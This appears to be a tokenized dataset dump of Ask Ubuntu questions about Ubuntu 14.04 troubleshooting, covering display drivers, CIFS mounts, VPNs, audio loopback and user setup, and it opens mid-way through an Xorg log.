) module fb : vendor= '' x.org foundation '' [ 55.636 ] compiled for 1.15.1 , module version = 1.0.0 [ 55.636 ] abi class : x.org ansi c emulation , version 0.4 [ 55.636 ] ( ii ) loading sub module `` shadow '' [ 55.636 ] ( ii ) loadmodule : `` shadow '' [ 55.636 ] ( ii ) loading /usr/lib/xorg/modules/libshadow.so [ 55.722 ] ( ii ) module shadow : vendor= '' x.org foundation '' [ 55.722 ] compiled for 1.15.1 , module version = 1.1.0 [ 55.722 ] abi class : x.org ansi c emulation , version 0.4 [ 55.722 ] ( -- ) depth 24 pixmap format is 32 bpp [ 55.751 ] ( == ) modesetting ( g0 ) : backing store enabled [ 55.751 ] ( == ) modesetting ( g0 ) : silken mouse enabled [ 55.751 ] ( ii ) modesetting ( g0 ) : randr 1.2 enabled , ignore the following randr disabled message . [ 55.751 ] ( == ) modesetting ( g0 ) : dpms enabled [ 55.751 ] ( ww ) modesetting ( g0 ) : option `` allowemptyinitialconfiguration '' is not used [ 56.060 ] ( ii ) nvidia : using 3072.00 mb of virtual memory for indirect memory [ 56.060 ] ( ii ) nvidia : access . [ 56.186 ] ( ii ) nvidia ( 0 ) : setting mode `` crt-0 : nvidia-auto-select '' [ 56.255 ] loading extension nv-glx [ 56.376 ] ( == ) nvidia ( 0 ) : disabling shared memory pixmaps [ 56.376 ] ( == ) nvidia ( 0 ) : backing store enabled [ 56.376 ] ( == ) nvidia ( 0 ) : silken mouse enabled [ 56.376 ] ( == ) nvidia ( 0 ) : dpms enabled [ 56.376 ] loading extension nv-control [ 56.377 ] loading extension xinerama [ 56.377 ] ( ii ) loading sub module `` dri2 '' [ 56.377 ] ( ii ) loadmodule : `` dri2 '' [ 56.377 ] ( ii ) module `` dri2 '' already built-in [ 56.377 ] ( ii ) nvidia ( 0 ) : [ dri2 ] setup complete [ 56.377 ] ( ii ) nvidia ( 0 ) : [ dri2 ] vdpau driver : nvidia [ 56.377 ] ( -- ) randr disabled [ 56.415 ] ( ii ) selinux : disabled on system [ 56.492 ] ( ii ) initializing extension glx [ 56.492 ] ( ii ) modesetting ( g0 ) : damage tracking initialized [ 57.742 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 57.765 ] ( ii ) config/udev : adding input device power button ( /dev/input/event3 ) removed evdev- related stuff [ 58.244 ] ( ww ) nvidia ( gpu-0 ) : unable to read edid for display device crt-0 [ 58.244 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 58.244 ] ( ** ) nvidia ( 0 ) : device crt-0 ( using edid frequencies has been enabled on [ 58.244 ] ( ** ) nvidia ( 0 ) : all display devices . ) [ 58.261 ] ( ww ) nvidia ( gpu-0 ) : unable to read edid for display device crt-0 [ 58.261 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 58.261 ] ( ** ) nvidia ( 0 ) : device crt-0 ( using edid frequencies has been enabled on [ 58.261 ] ( ** ) nvidia ( 0 ) : all display devices . ) [ 58.277 ] ( ww ) nvidia ( gpu-0 ) : unable to read edid for display device crt-0 [ 58.277 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 58.277 ] ( ** ) nvidia ( 0 ) : device crt-0 ( using edid frequencies has been enabled on [ 58.277 ] ( ** ) nvidia ( 0 ) : all display devices . ) [ 58.327 ] ( ww ) nvidia ( gpu-0 ) : unable to read edid for display device crt-0 [ 58.327 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 58.327 ] ( ** ) nvidia ( 0 ) : device crt-0 ( using edid frequencies has been enabled on [ 58.327 ] ( ** ) nvidia ( 0 ) : all display devices . ) [ 58.344 ] ( ww ) nvidia ( gpu-0 ) : unable to read edid for display device crt-0 [ 58.344 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 58.345 ] ( ** ) nvidia ( 0 ) : device crt-0 ( using edid frequencies has been enabled on [ 58.345 ] ( ** ) nvidia ( 0 ) : all display devices . ) [ 58.361 ] ( ww ) nvidia ( gpu-0 ) : unable to read edid for display device crt-0 [ 58.361 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 58.361 ] ( ** ) nvidia ( 0 ) : device crt-0 ( using edid frequencies has been enabled on [ 58.361 ] ( ** ) nvidia ( 0 ) : all display devices . ) [ 58.378 ] ( ww ) nvidia ( gpu-0 ) : unable to read edid for display device crt-0 [ 58.378 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 58.378 ] ( ** ) nvidia ( 0 ) : device crt-0 ( using edid frequencies has been enabled on [ 58.378 ] ( ** ) nvidia ( 0 ) : all display devices . ) [ 58.381 ] ( ii ) modesetting ( g0 ) : edid vendor `` sec '' , prod id 16716 [ 58.381 ] ( ii ) modesetting ( g0 ) : printing ddc gathered modelines : [ 58.381 ] ( ii ) modesetting ( g0 ) : modeline `` 1366x768 '' x0.0 72.33 1366 1414 1446 1526 768 770 775 790 -hsync -vsync ( 47.4 khz ep ) [ 58.382 ] reporting 4 5 41 296 [ 58.413 ] have a master to look out for [ 58.413 ] adjust shatters 0 1366 [ 58.414 ] need to create shared pixmap 1 ( ww ) nvidia ( gpu-0 ) : unable to read edid for display device crt-0 [ 58.578 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 58.578 ] ( ** ) nvidia ( 0 ) : device crt-0 ( using edid frequencies has been enabled on [ 58.578 ] ( ** ) nvidia ( 0 ) : all display devices . ) [ 58.595 ] ( ww ) nvidia ( gpu-0 ) : unable to read edid for display device crt-0 [ 58.595 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 58.595 ] ( ** ) nvidia ( 0 ) : device crt-0 ( using edid frequencies has been enabled on [ 58.595 ] ( ** ) nvidia ( 0 ) : all display devices . ) [ 58.596 ] ( ii ) modesetting ( g0 ) : edid vendor `` sec '' , prod id 16716 [ 58.596 ] ( ii ) modesetting ( g0 ) : printing ddc gathered modelines : [ 58.596 ] ( ii ) modesetting ( g0 ) : modeline `` 1366x768 '' x0.0 72.33 1366 1414 1446 1526 768 770 775 790 -hsync -vsync ( 47.4 khz ep ) [ 58.598 ] reporting 4 5 34 247 [ 58.612 ] ( ww ) nvidia ( gpu-0 ) : unable to read edid for display device crt-0 [ 58.612 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 58.612 ] ( ** ) nvidia ( 0 ) : device crt-0 ( using edid frequencies has been enabled on [ 58.612 ] ( ** ) nvidia ( 0 ) : all display devices . ) [ 58.629 ] ( ww ) nvidia ( gpu-0 ) : unable to read edid for display device crt-0 [ 58.629 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 58.629 ] ( ** ) nvidia ( 0 ) : device crt-0 ( using edid frequencies has been enabled on [ 58.629 ] ( ** ) nvidia ( 0 ) : all display devices . ) [ 58.629 ] ( ii ) modesetting ( g0 ) : edid vendor `` sec '' , prod id 16716 [ 58.629 ] ( ii ) modesetting ( g0 ) : printing ddc gathered modelines : [ 58.629 ] ( ii ) modesetting ( g0 ) : modeline `` 1366x768 '' x0.0 72.33 1366 1414 1446 1526 768 770 775 790 -hsync -vsync ( 47.4 khz ep ) [ 58.631 ] reporting 4 5 34 247 [ 58.632 ] have a master to look out for [ 58.765 ] need to create shared pixmap 1 ( ww ) nvidia ( gpu-0 ) : unable to read edid for display device crt-0 [ 58.778 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 58.778 ] ( ** ) nvidia ( 0 ) : device crt-0 ( using edid frequencies has been enabled on [ 58.778 ] ( ** ) nvidia ( 0 ) : all display devices . ) [ 58.796 ] ( ww ) nvidia ( gpu-0 ) : unable to read edid for display device crt-0 [ 58.796 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 58.796 ] ( ** ) nvidia ( 0 ) : device crt-0 ( using edid frequencies has been enabled on [ 58.796 ] ( ** ) nvidia ( 0 ) : all display devices . ) [ 58.796 ] ( ii ) modesetting ( g0 ) : edid vendor `` sec '' , prod id 16716 [ 58.796 ] ( ii ) modesetting ( g0 ) : printing ddc gathered modelines : [ 58.796 ] ( ii ) modesetting ( g0 ) : modeline `` 1366x768 '' x0.0 72.33 1366 1414 1446 1526 768 770 775 790 -hsync -vsync ( 47.4 khz ep ) [ 58.798 ] reporting 4 5 34 247 [ 58.830 ] have a master to look out for [ 58.831 ] adjust shatters 0 1366 [ 58.832 ] need to create shared pixmap 1 ( ii ) unloadmodule : `` synaptics '' removed unrelated parts [ 60.338 ] ( ii ) nvidia ( gpu-0 ) : deleting gpu-0 [ 60.754 ] ( ee ) server terminated successfully ( 0 ) . closing log file .
491807	applications run , do n't display	i 'm new to ubuntu and linux . the preinstalled programs work fine , but anything that i download from ubuntu software center such as pidgin or chromium or from online runs ( i can hear the sounds of pidgin ) but do n't display when opened . when i do an alt+tab , i can see a thumbnail of the gui but ca n't do anything when i run them from the terminal , i get the following messages : chromium - attention : default value of option force_s3tc_enable overridden by environment . pidgin - exiting because another libpurple client is already running .
491808	cifs vfs : error messages	i 'm running two ubuntu systems , ( 12.04 on 64-bit amd desktop system and 14.04 on a 64-bit intel laptop ) , and have configured two cifs drives to be mounted at system start-up following the instructions at https : //help.ubuntu.com/community/mountwindowssharespermanently i 've configured these drives using the following entries in /etc/fstab : //gbsfp1/kgallant /home/kgallant/nethome cifs credentials=/etc/samba/credentials , rw , iocharset=utf8 , _netdev , uid=1000 , gid=1000 0 0 //gbsfp1/share /home/kgallant/netshare cifs credentials=/etc/samba/credentials , rw , iocharset=utf8 , _netdev , uid=1000 , gid=1000 0 0 both drives are always successfully mounted by the time i log in on either machine yet a series of error messages are always reported during system boot that say : jul 4 10:52:07 gbsdt1 kernel : [ 20.976113 ] cifs vfs : error connecting to socket . aborting operation jul 4 10:52:07 gbsdt1 kernel : [ 20.976509 ] cifs vfs : cifs_mount failed w/return code = -101 these messages are repeated five to ten times in syslog and , in the case of the 14.04 machine , on the screen during system boot . it appears that both systems are attempting to mount the drives before network services are initialized which i believe is the root cause of the problem . documentation suggests that the _netdev option would prevent this , but it does n't seem to have any effect on either the 12.04 or 14.04 systems . the network drives are provided by a samba server running on a fedora 14 machine . is there any way to delay mounting these file systems until after network services are available , ( if , as i suspect , that is the cause of the problem ) ? or any other suggestions would be appreciated . thanks in advance !
491809	remap menu key to delta ( î ) ?	i 'm using xubuntu 14.04 . my keyboard is a belgian azerty . i never use my menu key , and i use the delta sign a lot . i 'm not willing to switch keyboard layouts to greek , as the delta is the only thing i use . i 've tried : xmodmap , but that did n't work as it is n't compatible anymore , someone told me . a combination of xbindkeys and xte i 've put this in my .xbindkeysrc file : '' xte 'keydown control_l ' 'keydown shift_l ' 'key u ' 'key agrave ' 'key quotedbl ' 'key ccedilla ' 'key apostrophe ' 'keyup control_l ' 'keyup shift_l ' '' menu this did n't do anything , even after restarting , except that i ca n't use the menu key anymore ( i intended to do that , but it had to type a delta too . ) adding the xte command above as a keyboard shortcut . did n't work , again , except stopping the menu key from doing its normal job . note : the command does type a delta for me if i enter it in the terminal , it 's just not working as a keyboard shortcut . any other ways to do this , or things i am do wrong ? and how can i do this with xkb , because i have no clue and it seems to be xmodmap 's replacement ?
491817	burg bootloader ubuntu 14.04	hello i 'm a relatively new ubuntu user and i 'm having some trouble with the burg bootloader . the issue is that when i choose the ubuntu option it works 1/3 of the time without any trouble but sometimes the resolution when i get to ubuntu is weird and half the screen is not shown and sometimes it does n't start at all but freezes on a black screen . i 've tried changing the resolution in burg , even reinstalling ubuntu but nothing seems to help . i find burg a nice alternative to grub so i would really appreciate some help .
491820	how do i get youtube to work ?	i just downloaded ubuntu . but when i go to youtube the videos play horribly and i get a window saying the plug in is needed but then when i try to add it it says it ca n't find a suitable plug in . i have tried to download flash player and lightstream and i have no idea what is going on with either one . i keep launching them over and over and nothing works . i have no idea what to do , can someone help ?
491823	lubuntu wi-fi driver installation with no wired connection	i 'm going to install lubuntu on my parent 's old pc ( amd 2200+ 1.8ghz , 1gb ram , geforce fx 5200 ) because new linux mint does n't work with this gpu : ( i tried the livecd and it does not look as good as mint , but it should be ok for my parents . the only problem is that it does n't detect any wi-fi networks so i will have to install the driver from the internet ; however , i ca n't wire this old pc to router which is on the other floor ( do n't ask if maybe i can move pc/router , no way ) . how can use my laptop to get the proper drivers ( .deb package ? ) , then copy and install on pc ? wi-fi card is ralink 3060 .
491825	pulseaudio loopback latency	i am using pulseaudio loopback 's to link together my system sounds and my microphone . the problem is that my system sounds have a delay of a second or even more sometimes . i have changed ticked simultaneous in paprefs but that has not fixed it . i am using this script to do so . stream_module= $ ( pactl load-module module-null-sink sink_name=streamaudio sink_properties=device.description= '' streamaudio '' ) pactl load-module module-loopback source=alsa_output.pci-0000_00_1b.0.analog-stereo.monitor sink=streamaudio latency_msec=1 > > /dev/null pactl load-module module-loopback source=alsa_input.usb-akm_ak5370-00-ak5370.analog-mono sink=streamaudio latency_msec=1 > > /dev/null pactl load-module module-device-manager > > /dev/null read -p `` loaded ! press enter to unload ! '' pactl unload-module $ stream_module pactl unload-module module-device-manager pactl unload-module module-null-sink pactl unload-module module-loopback i have gone through pages of google , but nothing seems to fix it . is there something obvious i am missing ? alsa_output.pci-0000_00_1b.0.analog-stereo.monitor are all my system sounds . alsa_input.usb-akm_ak5370-00-ak5370.analog-mono is my microphone here is an example where the delay becomes 3.4 seconds : http : //screencloud.net/v/tnaq while the other loopback has a lot less http : //screencloud.net/v/suif from what i can tell , for some reason the buffer fills up . any way i can flush it or something ?
491827	lubuntu 14.04 : can not start power manager	i recently installed the lubuntu desktop and i ca n't start the power manager . it returns the question : xfce4 power manager is not running , do you want to launch it now ? but when i click run , it does nothing . running xfce4-power-manager from the terminal , even as superuser ( i.e . sudo xfce4-power-manager ) , does absolutely nothing . what 's wrong ?
491829	can not get 12.04 or 14.04 to work ?	so my video card is nvidia 6150se and before i can even type in my password , it freezes . i am using 12.04 in `` demo mode '' right now , but when i try to start the installed version , it goes to a blank purple screen . i tried 14.04 and that would crash after i put my password in . is my video card non-compatible with ububntu ? is there a different distro i should use ? i am really new to linux , please help me !
491832	creating a wifi hotspot from a wired connection on macbook for iphones	i am trying to configure my own hotspot . i 've tried following the instructions in this answer : http : //askubuntu.com/a/180734/297819 with no use . i do n't have 'ap ' appear in `` supported interface modes '' , and i ca n't find the file etc/hostapd/hostapd.conf either . and apparently , ubuntu 14.04 ( my version ) has a problem with the update of hostapd anyway . any suggestions ?
491834	sound morphing software	i need real-time sound morphing software for linux , but i ca n't find anything . something ib ubuntu software center did n't started , and astersk-voicechanger is uninstallable . in windows there is a bunch of such a software , but i think wining them wo n't give any result . suggest such kind of app if you know
491836	ubuntu 14.04 unresponsive after install nvidia driver	i installed ubuntu 14.04 and nvidia driver 331.38 from additional driver of ubuntu , after this sometimes the system unresponsive , the mouse not work , the display not work and when i disable driver nvidia with nvidia-prime , ubuntu work fine . thanks for your help
491839	how do i get a list of needed packages	i want to know how to get a list of needed packages for a program . i want to get one program/application from one computer to another , by taking every package that is needed and compile it on the other computer . how do i get a list of needed packages for a program ?
491840	ubuntu 14.04 installation crashes with `` ? ? ? '' message after selecting drive	the gist : i have been trying to erase my disk and install ubuntu 14.04 lts on my laptop as my sole operating system . i can boot `` try ubuntu '' or `` install ubuntu '' from a usb stick . during the graphical install , after i select `` erase disk and install ubuntu '' as my installation type , i have a choice to select between one of two raid0 drives on which to install ubuntu . ( one is 18.2gb and the other is 439gb , so i naturally pick the larger one . ) regardless of which drive i select , one of two bad things generally happens . in the first case , i get an error message saying `` ? ? ? '' as soon as i proceed to the next screen . in the second case , i successfully manage get past the next screen , get 75 % of the way through installing updates and packages , and then the installer crashes . precisely what i did before reaching this state : downloaded ubuntu 14.04 lts ( trusty tahr ) 64-bit pc ( amd64 ) desktop image . ran md5sum on the file and checked that it matched the hash on ubuntu hashes . it matched correctly . used universal usb installer ( on windows ) to format my usb drive ( fat32 ) and mount the image on my drive . re-booted with the usb drive plugged in , entered the boot menu , and selected `` try ubuntu . '' ubuntu successfully loads . clicked icon on desktop labeled `` install ubuntu 14.04 lts '' to open graphical installation . chose all recommended options up until the screen that says '' installation type '' , where i selected `` erase disk and install ubuntu . '' i then had a choice between two drives on which to install ubuntu : an 18.2gb drive labeled raid0rst and a 439.2gb drive labeled raid0sys . i selected the larger drive . i reach a time zone screen , then an error message saying `` ? ? ? '' appears . i ca n't click anything . my screen goes black and freezes . i tried this installation approach a few different ways , each time with the same result . at this point , i wanted to start over fresh , so i opened gparted , deleted all of my partitions , and rebooted as before . when i do this , i usually manage to get past the screen with the `` ? ? ? '' message successfully , although the installation crashes 75 % of the way through installing updates at the end . now i have two different partial ubuntu installations on my boot menu , both of which i can open . however , i do n't trust either of them because both show several obvious signs of an incomplete installation . potentially relevant info ( partitions , hardware , etc ) : partitions info running sudo fdisk -l produces the following warnings : **warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb does n't contain a valid partition table warning : gpt ( guid partition table ) detected on '/dev/mapper/isw_dbdbgfbgbe_raid0sys ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/mapper/isw_dbdbgfbgbe_raid0sys2 does n't contain a valid partition table warning : gpt ( guid partition table ) detected on '/dev/mapper/isw_dbdbgfbgbe_raid0sys3 ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/mapper/isw_dbdbgfbgbe_raid0sys3 does n't contain a valid partition table warning : gpt ( guid partition table ) detected on '/dev/mapper/isw_dbdbgfbgbe_raid0rst ' ! the util fdisk does n't support gpt . use gnu parted . ** and the following output : disk /dev/sda : 256.1 gb , 256060514304 bytes 255 heads , 63 sectors/track , 31130 cylinders , total 500118192 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sda1 1 964690431 482345215+ ee gpt disk /dev/sdb : 256.1 gb , 256060514304 bytes 255 heads , 63 sectors/track , 31130 cylinders , total 500118192 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x695f6563 disk /dev/mapper/isw_dbdbgfbgbe_raid0sys : 493.9 gb , 493921501184 bytes 255 heads , 63 sectors/track , 60049 cylinders , total 964690432 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 131072 bytes / 262144 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/mapper/isw_dbdbgfbgbe_raid0sys1 1 964690431 482345215+ ee gpt partition 1 does not start on physical sector boundary . disk /dev/mapper/isw_dbdbgfbgbe_raid0sys1 : 537 mb , 537657344 bytes 255 heads , 63 sectors/track , 65 cylinders , total 1050112 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 131072 bytes / 262144 bytes disk identifier : 0x00000000 device boot start end blocks id system disk /dev/mapper/isw_dbdbgfbgbe_raid0sys2 : 484.9 gb , 484913971200 bytes 255 heads , 63 sectors/track , 58954 cylinders , total 947097600 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 131072 bytes / 262144 bytes disk identifier : 0x00000000 disk /dev/mapper/isw_dbdbgfbgbe_raid0sys3 : 8469 mb , 8469348352 bytes 255 heads , 63 sectors/track , 1029 cylinders , total 16541696 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 131072 bytes / 262144 bytes disk identifier : 0xc62b49f5 disk /dev/mapper/isw_dbdbgfbgbe_raid0rst : 18.2 gb , 18181521408 bytes 255 heads , 63 sectors/track , 2210 cylinders , total 35510784 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 131072 bytes / 262144 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/mapper/isw_dbdbgfbgbe_raid0rst1 1 35510783 17755391+ ee gpt partition 1 does not start on physical sector boundary . disk /dev/sdc : 15.6 gb , 15610576896 bytes 119 heads , 55 sectors/track , 4658 cylinders , total 30489408 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc3072e18 device boot start end blocks id system /dev/sdc1 * 8064 30489407 15240672 c w95 fat32 ( lba ) hardware asus zenbook ux51vz-xh71 brand new , sexy . came with windows 8 pro 64-bit out-of-the-box . specs are listed here . pny 16gb usb 2.0 stick ( p-fd16gatt03-ge ) . new . fat32 formatted out-of-the-box . edit : i mostly resolved my issue here . ( see comments in the hannu 's answer . ) my only remaining issue is that i have duplicate ubuntu entries in my boot menu .
491841	sierra wireless 313u 3g broadband modem will not work since upgrade to 14.04	i recently upgraded my toshiba portege laptop to 14.04 . since doing so , i can not get my sierra wireless air card 313u to connect . since this unit worked fine in the previous lts version , i believe the issue is either with 14.04 or with my upgrade . previously , i would use this usb air card as follows : prior to plugging in the aircard , in the past version , there would be no `` enable mobile broadband '' option in the networking drop down menu . when the air card is plugged in , after it boots and there is a blinking green light on the dongle indicating that it is communicating with the network , the `` enable mobile broadband '' menu item would appear and i would check it . afer several seconds , a notification would appear on the laptop screen indicating that i am now `` registered on the gsm network . '' i would then select the `` at & t laptopconnect ( data cards ) selection on the drop down menu , and i would receive a notice that i was connected to the network through that connection . since upgrading to 14.04 : i plug in the air card as before . there is an `` enable mobile broadband '' option on the drop down menu as before . note that my `` at & t laptopconnect '' connection is also present , and not grayed out as it used to be under the previous version . if i check `` enable mobile broadband , '' after several seconds i get the notification `` mobile broadband enabled - you are now registered on the home network . '' if i then click on `` at & t laptop connect '' the network icon will indicate activity , but then i receive the notice `` modem disconnected '' at this point , there is no longer an entry in the drop down menu for the `` at & t laptop connect '' connection , and the `` mobile broadband '' entry is unchecked again . i have tried bypassing the step of checking `` enable mobile broadband '' and going straight to the step of selecting the `` at & t laptopconnect '' connection , and the results are the same . i have tried building a new connection for the at & t modem , with the same results when i use it . i have confirmed that there is an entry for what i believe to be the modem when i query lsusb in a terminal . i have confirmed that the connection , with a uuid , is present by using the nmcli connection command . i do not recall having to use any proprietary drivers for this modem , but i 'm wondering if perhaps there was a driver that got wiped out during the recent upgrade to 14.04 ? from research on this and other forums , there appears to be considerable comment concerning mobile broadband and 14.04 . is there an issue here ? if not , what can i do to be able to use the modem again ?
491842	ownership on usb drive correct but read/write permisisons denied	i am really at a loss with this problem . i recently changed uid numbers of my users ( username was kept ) because i changed authentication to kerberos/ldap authentication . this works all fine , i have changed all the home directory permission of the users ( including hidden files ) but now i can not read any usb disks that i connect . no problem to read the disks as root . the permissions ( with sudo ls-l /media/usera/ ) look like : drwx -- -- -- 3 usera groupa 4096 jan 1 1970 transcend usera and groupa are correct and also has the correct number ids . yet nautilus gives me : could not open the file â/media/usera/transcendâ . you do not have the permissions necessary to open the file . needless to say , ls -l /media/usera gives me : ls : can not access /media/usera : permission denied this is happening for all users . i am thinking there must be a database for the disks ( or users ) somewhere that still links to the old uid numbers ( an acl somewhere ? ) . but maybe i am completely on the wrong track . any help would be greatly appreciated .
491845	dock with launcher	i was wondering if there is any dock such as awn that has an available plug-in for an os x launchpad-style application launcher ? i tried searching online , but not much came up in terms of what i was looking for for reference : http : //km.support.apple.com/library/apple/applecare_allgeos/ht5548/en_us/ht5548_03-osx_9-launchpad-overview-001-en.png thanks
491846	usb mass storage not detecting	i just installed virtualbox , and the latest ( ubuntu 14.04 lts ) , and the only usb device which detects is my logitech mouse . i 'm using virtualbox .
491847	what is an easy way to add new user	i have read about the command sudo adduser newuser and sudo passwd -l but if i understood correct i have to grant every thing by terminal . i created easily a new user by systems > user accounts but it is disable and i did n't find where entry the password and set the grants . is there an easy way by windows instead of terminal ? if not , what is the simplest way to create an user that will be equivalent to a microsoft windows 8 user but without administration privileges ?
491853	how to install kde on lubuntu 14.04	at my work we had to install a linux distribution to replace windows xp . we liked kde but we only had to use cds . so we chose lubuntu and now we want kde . is there any way we can install kde . will it erase any applications that have been installed ( libreoffice , virtualbox , code : :blocks ide , and filezilla ) . thank you in advance .
491857	ca n't update ubuntu 12.10 in lenovo g580	i 'm above mentioned laptop running ubuntu 12.10.when i issue sudo apt-get update it shows ign cdrom : //ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) precise release.gpg ign cdrom : //ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) precise release err cdrom : //ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) precise/main i386 packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms err cdrom : //ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) precise/restricted i386 packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms ign cdrom : //ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) precise/main translation-en_in ign cdrom : //ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) precise/main translation-en ign cdrom : //ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) precise/restricted translation-en_in ign cdrom : //ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) precise/restricted translation-en my machine configuration is intel i5 32 bit machine.please help me to solve this .
491860	how to enable bluetooth on hp pavillion g6 2230tx running ubuntu 14.04 ?	it has been a week now since i 've installed ubuntu 14.04lts on my laptop . it is an excellent operating system far better than windows 8.1 ... it serves my purpose . it has everything that i need and i am keen on learning more about this system . one more thing that i would like to ask is that once you switch on the aeroplane mode it 's hard to re-connect with your wifi . i do n't know about the rest but i am facing this problem .
491861	dual boot ubuntu 14 .04lts	i 'm currently using windows xp need to keep it on and install ubuntu 14.04 lts can i keep both os on one hdd dual boot ? i would n't with virtual box .
491863	how to force the pixel density pixel ?	i want to know ( and if it 's possible ) how to change or force the density pixel of my screen ? i do n't know how to do it , anyone can tell me ?
491868	i m getting problem in installing traceroute utility	i m getting this atul @ ubuntu : ~ $ sudo apt-get install traceroute [ sudo ] password for atul : reading package lists ... done building dependency tree reading state information ... done package traceroute is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'traceroute ' has no installation candidate can any one tell me how to solve this problem ?
491889	connecting to private ip 's in ubuntu 14.04 with microsoft vpn	i have an installation of ubuntu 14.04 configured with a vpn connection . i followed this article which seemed to pertain to ubuntu 12.10 but the instructions seemed to apply for the new version as well . when i connect to the vpn ( which does seem to connect successfully ) , i am unable to access any internal resources using either ip address or dns name . however , if i go to google.com , i am redirected to the regional google site for that connection ( google.no ) . i have this vpn set up and working well in windows , so perhaps there is some way to recreate the following setup in ubuntu 14.04 ? this is a section of the command ipconfig /all in windows 8 : ppp adapter ( my vpn name ) : connection-specific dns suffix . : description . . . . . . . . . . . : ( my vpn name ) physical address . . . . . . . . . : dhcp enabled . . . . . . . . . . . : no autoconfiguration enabled . . . . : yes ipv4 address . . . . . . . . . . . : 192.168.0.79 ( preferred ) subnet mask . . . . . . . . . . . : 255.255.255.255 default gateway . . . . . . . . . : dns servers . . . . . . . . . . . : 192.168.0.91 192.168.0.1 netbios over tcpip . . . . . . . . : enabled this is the output from netstat -rn : kernel ip routing table destination gateway genmask flags mss window irtt iface 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 wlan0 192.168.0.0 0.0.0.0 255.255.255.0 u 0 0 0 wlan0 192.168.0.103 0.0.0.0 255.255.255.255 uh 0 0 0 ppp0 ( vpn gateway ) 192.168.0.1 255.255.255.255 ugh 0 0 0 wlan0 ( vpn gateway ) 192.168.0.1 255.255.255.255 ugh 0 0 0 wlan0 many thanks in advance .
491891	how to install any on ubuntu 14.04 lts	i 'm trying to install .tar.gz by command sudo apt -get filename.tar.gz error is e : command line option 'g ' from-get is not known .
491892	impossible to start ubuntu after installing lxde	i just tried installing lxde on my ubuntu 14.04 . i wanted to try working with two different screen at the same time . so to do that typed ctrl+alt+f2 to go in another terminal and then i typed the command : startx exec startlxde -- :1 vt8 . actually it did n't work , it appeared just a black screen on display 1 ( i 've seen it typing ctrl+alt+f8 ) . by the way the problem is another one . now when i reboot the system it appears the ligthdm screen ( before this it did n't used to appear ) which asks me the password . if i put the password it tries to start but immedialtely comes back to the lightdm . i can just start the system as guest user . what should i do ?
